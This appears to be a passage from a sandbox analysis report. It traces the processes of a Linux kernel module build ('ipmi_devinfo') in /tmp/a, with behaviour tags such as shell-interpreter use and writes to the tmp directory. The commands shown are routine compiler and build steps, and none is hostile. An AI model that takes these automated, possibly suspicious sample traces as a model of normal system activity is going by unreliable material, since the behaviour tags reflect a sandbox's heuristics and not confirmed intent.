-DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -Werror=implicit-int -Werror=strict-prototypes -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -DMODULE -DKBUILD_BASENAME='\"ipmi_devinfo\"' -DKBUILD_MODNAME='\"ipmi_devinfo\"' -c -o /tmp/a/.tmp_ipmi_devinfo.o /tmp/a/ipmi_devinfo.c; scripts/basic/fixdep /tmp/a/.ipmi_devinfo.o.d /tmp/a/ipmi_devinfo.o 'gcc -Wall -Wp,-MD,/tmp/a/.ipmi_devinfo.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/7/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/kconfig.h -Iubuntu/include -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -Werror=implicit-int -Werror=strict-prototypes -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -DMODULE -DKBUILD_BASENAME='\\''\"ipmi_devinfo\"'\\'' -DKBUILD_MODNAME='\\''\"ipmi_devinfo\"'\\'' -c -o /tmp/a/.tmp_ipmi_devinfo.o /tmp/a/ipmi_devinfo.c' > /tmp/a/.ipmi_devinfo.o.tmp; rm -f /tmp/a/.ipmi_devinfo.o.d; mv -f /tmp/a/.ipmi_devinfo.o.tmp /tmp/a/.ipmi_devinfo.o.cmd; if objdump -h /tmp/a/.tmp_ipmi_devinfo.o | grep -q __ksymtab; then gcc -E -D__GENKSYMS__ -Wp,-MD,/tmp/a/.ipmi_devinfo.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/7/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/kconfig.h -Iubuntu/include -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -Werror=implicit-int -Werror=strict-prototypes -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -DMODULE -DKBUILD_BASENAME='\"ipmi_devinfo\"' -DKBUILD_MODNAME='\"ipmi_devinfo\"' /tmp/a/ipmi_devinfo.c | scripts/genksyms/genksyms -r /dev/null > /tmp/a/.tmp_ipmi_devinfo.ver; ld -m elf_x86_64 -z max-page-size=0x200000 -z noexecstack -r -o /tmp/a/ipmi_devinfo.o /tmp/a/.tmp_ipmi_devinfo.o -T /tmp/a/.tmp_ipmi_devinfo.ver; rm -f /tmp/a/.tmp_ipmi_devinfo.o /tmp/a/.tmp_ipmi_devinfo.ver; else mv -f /tmp/a/.tmp_ipmi_devinfo.o /tmp/a/ipmi_devinfo.o; fi; /bin/bash ./scripts/ubuntu-retpoline-extract-one /tmp/a/ipmi_devinfo.o /tmp/a/ipmi_devinfo.c \"\"; "4⤵PID:2173
-
/usr/bin/gccgcc -Wall "-Wp,-MD,/tmp/a/.ipmi_devinfo.o.d" -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/7/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/kconfig.h -Iubuntu/include -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -DCC_HAVE_ASM_GOTO "-Wframe-larger-than=1024" -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack "-Werror=implicit-int" "-Werror=strict-prototypes" "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" -DMODULE "-DKBUILD_BASENAME=\"ipmi_devinfo\"" "-DKBUILD_MODNAME=\"ipmi_devinfo\"" -c -o /tmp/a/.tmp_ipmi_devinfo.o /tmp/a/ipmi_devinfo.c5⤵PID:2174
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -nostdinc -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ubuntu/include -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_HAVE_ASM_GOTO -D CC_USING_FENTRY -D MODULE -D "KBUILD_BASENAME=\"ipmi_devinfo\"" -D "KBUILD_MODNAME=\"ipmi_devinfo\"" -isystem /usr/lib/gcc/x86_64-linux-gnu/7/include -include ./include/linux/kconfig.h -MD /tmp/a/.ipmi_devinfo.o.d /tmp/a/ipmi_devinfo.c -quiet -dumpbase ipmi_devinfo.c -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_ipmi_devinfo.o -O2 -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-int-in-bool-context "-Wframe-larger-than=1024" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-Werror=implicit-int" "-Werror=strict-prototypes" "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -fno-strict-overflow -fno-merge-all-constants -fmerge-constants "-fstack-check=no" -fconserve-stack --param "allow-store-data-races=0" -fstack-protector-strong -o -6⤵PID:2175
-
/usr/local/sbin/asas -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ubuntu/include --64 -o /tmp/a/.tmp_ipmi_devinfo.o6⤵PID:2176
-
/usr/local/bin/asas -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ubuntu/include --64 -o /tmp/a/.tmp_ipmi_devinfo.o6⤵PID:2176
-
/usr/sbin/asas -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ubuntu/include --64 -o /tmp/a/.tmp_ipmi_devinfo.o6⤵PID:2176
-
/usr/bin/asas -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ubuntu/include --64 -o /tmp/a/.tmp_ipmi_devinfo.o6⤵PID:2176
-
/usr/src/linux-headers-4.15.0-213-generic/scripts/basic/fixdepscripts/basic/fixdep /tmp/a/.ipmi_devinfo.o.d /tmp/a/ipmi_devinfo.o "gcc -Wall -Wp,-MD,/tmp/a/.ipmi_devinfo.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/7/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/kconfig.h -Iubuntu/include -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -Werror=implicit-int -Werror=strict-prototypes -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -DMODULE -DKBUILD_BASENAME='\"ipmi_devinfo\"' -DKBUILD_MODNAME='\"ipmi_devinfo\"' -c -o /tmp/a/.tmp_ipmi_devinfo.o /tmp/a/ipmi_devinfo.c"5⤵PID:2177
-
/bin/rmrm -f /tmp/a/.ipmi_devinfo.o.d5⤵PID:2178
-
/bin/mvmv -f /tmp/a/.ipmi_devinfo.o.tmp /tmp/a/.ipmi_devinfo.o.cmd5⤵PID:2179
-
/bin/grepgrep -q __ksymtab5⤵PID:2181
-
/usr/bin/objdumpobjdump -h /tmp/a/.tmp_ipmi_devinfo.o5⤵PID:2180
-
/bin/mvmv -f /tmp/a/.tmp_ipmi_devinfo.o /tmp/a/ipmi_devinfo.o5⤵PID:2182
-
/bin/bash/bin/bash ./scripts/ubuntu-retpoline-extract-one /tmp/a/ipmi_devinfo.o /tmp/a/ipmi_devinfo.c5⤵PID:2183
-
/bin/mktempmktemp --tmpdir retpoline-extract-XXXXXX6⤵PID:2184
-
/usr/bin/sortsort -k "1b,1"6⤵PID:2186
-
/usr/bin/awkawk "-F " " BEGIN { file=\"/tmp/a/ipmi_devinfo.o\"; src=\"/tmp/a/ipmi_devinfo.c\"; } /Disassembly of section/ { segment=\$4; sub(\":\", \"\", segment); } /^[0-9a-f][0-9a-f]* <.*>:/ { tag=\$0; sub(\".*<\", \"\", tag); sub(\">.*\", \"\", tag); } \$0 ~ /(call|jmp)q? *\\*0x[0-9a-f]*\\(%rip\\)/ { next } \$0 ~ /(call|jmp)q? *\\*.*%/ { sub(\":\", \"\", \$1); if (segment != \".init.text\") { offset=\$1 \$1=tag print(file \"-\" segment \"-\" offset \" \" src \" \" segment \" \" \$0); } } "6⤵PID:2188
-
/usr/bin/objdumpobjdump --disassemble --no-show-raw-insn /tmp/a/ipmi_devinfo.o6⤵PID:2187
-
/bin/rmrm -f /tmp/a/ipmi_devinfo.o.ur-detected6⤵PID:2189
-
/usr/bin/awkawk "(\$4 == \"SECTION\" && \$1 ~ /^[0-9]*:/) { printf(\"%08x %08x\\n\", int(\$1), int(\$7)); }"6⤵PID:2192
-
/usr/bin/readelfreadelf -W --syms /tmp/a/ipmi_devinfo.o6⤵PID:2191
-
/usr/bin/awkawk " { sub(\"\\\\[\", \"\"); sub(\"\\\\]\", \"\"); } (\$1 ~ /^[0-9][0-9]*/) { printf(\"%08x %s %s %s\\n\", int(\$1), \$2, \$3, \$4); } "6⤵PID:2196
-
/usr/bin/readelfreadelf -W --headers /tmp/a/ipmi_devinfo.o6⤵PID:2195
-
/usr/bin/sortsort -k "1b,1"6⤵PID:2199
-
/bin/sedsed -e "s/-00*\\([0-9a-f]\\)/-\\1/"6⤵PID:2202
-
/bin/sedsed -e "/^Hex/d" -e "/^\$/d" -e "/^ *NOTE/d" -e "s/ *[^ ][^ ]* *\\([0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f]\\) \\([0-9a-f ][0-9a-f ][0-9a-f ][0-9a-f ][0-9a-f ][0-9a-f ][0-9a-f ][0-9a-f ]\\) \\([0-9a-f ][0-9a-f ][0-9a-f ][0-9a-f ][0-9a-f ][0-9a-f ][0-9a-f ][0-9a-f ]\\) \\([0-9a-f ][0-9a-f ][0-9a-f ][0-9a-f ][0-9a-f ][0-9a-f ][0-9a-f ][0-9a-f ]\\) .*/\\1 \\2 \\3 \\4 /" -e "s/\\([0-9a-f][0-9a-f]\\)\\([0-9a-f][0-9a-f]\\)\\([0-9a-f][0-9a-f]\\)\\([0-9a-f][0-9a-f]\\) /\\4\\3\\2\\1 /g" -e "s/ \$//g" -e "s/ /\\n/g"6⤵PID:2204
-
/usr/bin/readelfreadelf --hex-dump .rela.discard.retpoline_safe /tmp/a/ipmi_devinfo.o6⤵PID:2203
-
/bin/rmrm -f /tmp/retpoline-extract-XKlrXZ6⤵PID:2205
-
/bin/sh/bin/sh -c "{ echo /tmp/a/ipmi_devinfo.ko; echo /tmp/a/ipmi_devinfo.o; \\ echo; } > /tmp/a/.tmp_versions/ipmi_devinfo.mod"4⤵PID:2206
-
/bin/sh/bin/sh -c "(cat /dev/null; echo kernel//tmp/a/ipmi_devinfo.ko;) > /tmp/a/modules.order"4⤵PID:2207
-
/bin/catcat /dev/null5⤵PID:2209
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵PID:2210
-
/bin/catcat include/config/kernel.release4⤵PID:2211
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵PID:2212
-
/bin/catcat include/config/kernel.release4⤵PID:2213
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵PID:2214
-
/bin/catcat include/config/kernel.release4⤵PID:2215
-
/bin/sh/bin/sh -c "echo ' Building modules, stage 2.';"3⤵PID:2216
-
/usr/local/sbin/makemake -f ./scripts/Makefile.modpost3⤵PID:2217
-
/usr/local/bin/makemake -f ./scripts/Makefile.modpost3⤵PID:2217
-
/usr/sbin/makemake -f ./scripts/Makefile.modpost3⤵PID:2217
-
/usr/bin/makemake -f ./scripts/Makefile.modpost3⤵PID:2217
-
/bin/sh/bin/sh -c "find /tmp/a/.tmp_versions -name '*.mod' | xargs -r grep -h '\\.ko\$' | sort -u"4⤵PID:2218
-
/usr/bin/sortsort -u5⤵PID:2221
-
/usr/bin/xargsxargs -r grep -h "\\.ko\$"5⤵PID:2220
-
/usr/local/sbin/grepgrep -h "\\.ko\$" /tmp/a/.tmp_versions/ipmi_devinfo.mod6⤵PID:2222
-
/usr/local/bin/grepgrep -h "\\.ko\$" /tmp/a/.tmp_versions/ipmi_devinfo.mod6⤵PID:2222
-
/usr/sbin/grepgrep -h "\\.ko\$" /tmp/a/.tmp_versions/ipmi_devinfo.mod6⤵PID:2222
-
/usr/bin/grepgrep -h "\\.ko\$" /tmp/a/.tmp_versions/ipmi_devinfo.mod6⤵PID:2222
-
/sbin/grepgrep -h "\\.ko\$" /tmp/a/.tmp_versions/ipmi_devinfo.mod6⤵PID:2222
-
/bin/grepgrep -h "\\.ko\$" /tmp/a/.tmp_versions/ipmi_devinfo.mod6⤵PID:2222
-
/usr/bin/findfind /tmp/a/.tmp_versions -name "*.mod"5⤵PID:2219
-
/bin/sh/bin/sh -c "echo ' MODPOST 1 modules'; find /tmp/a/.tmp_versions -name '*.mod' | xargs -r grep -h '\\.ko\$' | sort -u | sed 's/\\.ko\$/.o/' | scripts/mod/modpost -m -a -i ./Module.symvers -I /tmp/a/Module.symvers -o /tmp/a/Module.symvers -S -w -s -T - "4⤵
- Command and Scripting Interpreter: Unix Shell
PID:2223 -
/bin/sedsed "s/\\.ko\$/.o/"5⤵PID:2227
-
/usr/src/linux-headers-4.15.0-213-generic/scripts/mod/modpostscripts/mod/modpost -m -a -i ./Module.symvers -I /tmp/a/Module.symvers -o /tmp/a/Module.symvers -S -w -s -T -5⤵PID:2228
-
/usr/bin/sortsort -u5⤵PID:2226
-
/usr/bin/xargsxargs -r grep -h "\\.ko\$"5⤵
- Reads runtime system information
PID:2225 -
/usr/local/sbin/grepgrep -h "\\.ko\$" /tmp/a/.tmp_versions/ipmi_devinfo.mod6⤵PID:2229
-
/usr/local/bin/grepgrep -h "\\.ko\$" /tmp/a/.tmp_versions/ipmi_devinfo.mod6⤵PID:2229
-
/usr/sbin/grepgrep -h "\\.ko\$" /tmp/a/.tmp_versions/ipmi_devinfo.mod6⤵PID:2229
-
/usr/bin/grepgrep -h "\\.ko\$" /tmp/a/.tmp_versions/ipmi_devinfo.mod6⤵PID:2229
-
/sbin/grepgrep -h "\\.ko\$" /tmp/a/.tmp_versions/ipmi_devinfo.mod6⤵PID:2229
-
/bin/grepgrep -h "\\.ko\$" /tmp/a/.tmp_versions/ipmi_devinfo.mod6⤵PID:2229
-
/usr/bin/findfind /tmp/a/.tmp_versions -name "*.mod"5⤵
- Reads runtime system information
PID:2224 -
/bin/sh/bin/sh -c "set -e; echo ' CC /tmp/a/ipmi_devinfo.mod.o'; gcc -Wall -Wp,-MD,/tmp/a/.ipmi_devinfo.mod.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/7/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/kconfig.h -Iubuntu/include -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -Werror=implicit-int -Werror=strict-prototypes -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -DKBUILD_BASENAME='\"ipmi_devinfo.mod\"' -DKBUILD_MODNAME='\"ipmi_devinfo\"' -DMODULE -c -o /tmp/a/ipmi_devinfo.mod.o /tmp/a/ipmi_devinfo.mod.c; scripts/basic/fixdep /tmp/a/.ipmi_devinfo.mod.o.d /tmp/a/ipmi_devinfo.mod.o 'gcc -Wall -Wp,-MD,/tmp/a/.ipmi_devinfo.mod.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/7/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/kconfig.h -Iubuntu/include -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -Werror=implicit-int -Werror=strict-prototypes -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -DKBUILD_BASENAME='\\''\"ipmi_devinfo.mod\"'\\'' -DKBUILD_MODNAME='\\''\"ipmi_devinfo\"'\\'' -DMODULE -c -o /tmp/a/ipmi_devinfo.mod.o /tmp/a/ipmi_devinfo.mod.c' > /tmp/a/.ipmi_devinfo.mod.o.tmp; rm -f /tmp/a/.ipmi_devinfo.mod.o.d; mv -f /tmp/a/.ipmi_devinfo.mod.o.tmp /tmp/a/.ipmi_devinfo.mod.o.cmd;"4⤵
- Command and Scripting Interpreter: Unix Shell
- Writes file to tmp directory
PID:2230 -
